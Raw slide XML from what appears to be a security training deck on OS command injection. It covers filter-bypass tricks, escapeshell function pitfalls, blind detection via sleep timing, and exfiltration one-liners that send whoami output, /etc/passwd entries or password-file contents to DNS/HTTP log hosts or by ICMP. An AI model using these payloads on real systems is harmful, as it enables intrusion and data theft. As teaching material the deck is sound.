                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$IFS / ${IFS} / $IFS$9</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Angle brackets：&lt; / &lt;&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Curly brackets：{cat,/etc/passwd}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>TAB</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9" name="Google Shape;289;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6625575" y="1253331"/>
            <a:ext cx="4728225" cy="4351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Injection</a:t>
            </a:r>
            <a:endParaRPr/>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injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>NoSQL injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OS command injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Object Relational Mapping (ORM) injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>LDAP injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Expression Language injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Object Graph Navigation Library (OGNL) injection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Bypass Tricks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;29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Keywords Bypass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Variables Bypass:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>a=l;b=s;$a$b</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>echo $PATH| cut -c 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Backslash: ca\t fl\ag.txt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Quotes：cat fla’’g.txt / c"a"t f''l'a’g</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Glob：cat fl[a]g / cat fla* / cat fla? / cat fla{a..g}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97" name="Google Shape;297;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4289780" y="2694752"/>
            <a:ext cx="7902220" cy="130654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Bypass Tricks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Google Shape;30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Keywords Bypass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Base64: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Backslash: ca\t fl\ag.txt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Quotes：cat fla’’g.txt / c"a"t f''l'a’g</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Glob：cat fl[a]g / cat fla* / cat fla? / cat fla{a..g}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Bypass Tricks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Google Shape;30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Escapeshellarg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Make sure that the user gives only one argument to the command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can not execute different commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="310" name="Google Shape;310;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="921025" y="2283069"/>
            <a:ext cx="10349949" cy="229186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Bypass Tricks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;31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Escapeshellcmd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Make sure that the user executes only one command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>User can give many arguments to the command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can not execute different commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="317" name="Google Shape;317;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2368028"/>
            <a:ext cx="10660545" cy="21219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Useful Bypass Tricks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;3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escapeshellarg -&gt; escapeshellcmd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CVE-2016-10045</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https://paper.seebug.org/164/</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29" name="Google Shape;32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Most of what we have mentioned before are command injections that have hints or part of the prompt, what do we do when our command do not return response to us?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35" name="Google Shape;33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DNSLog/HTTPLog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Since outbound DNS traffic is usually not blocked from getting through, we can know the result of our command execution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curl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://testhash.test.dnslog.link/?`whoami`</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>dig `cut -d: -s -f1 /etc/passwd | sed 10\!d` @ip</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>With a variety of command tools that can trigger HTTP/DNS requests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41" name="Google Shape;34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DNSLog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342" name="Google Shape;342;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4744381" y="1388196"/>
            <a:ext cx="7447619" cy="53047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48" name="Google Shape;34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Some useful log platform</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HTTP/DNS: https://requestrepo.com/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP/DNS: https://requestbin.net/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP/DNS: ceye.io</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DNS: dnslog.cn</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTTP/SMTP: https://webhook.site/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54" name="Google Shape;35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our target don‘t have the access to the internet, what can we do?</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We need some oracles!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OS Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;10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60" name="Google Shape;36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 way to check for command injection is to use sleep and watch for an increase in execution time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For example:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ping –c 4 8.8.8.8 `sleep 5`</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ping –c 4 8.8.8.8 &amp;&amp; `sleep 5`</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pP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67" name="Google Shape;36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sleep $(hostname | cut -c 1 | tr a 5)</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We run the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Let's assume it returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hacker.local</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output will be passed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cut -c 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. This will pick the first character h of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hacker.local</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> command then will try to replace the character </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</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Fail to execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sleep h </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> only accepts number as its argument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>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OS Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Google Shape;374;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Other protocol</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ICMP example：</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done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 Command</a:t>
            </a:r>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execute OS command in program language?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system(“ls”);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 Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;12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execute OS command in program language?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system(“ls”);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What is OS Command Injection?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It allows an attacker to execute operating system (OS) commands on the server that is running an application</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
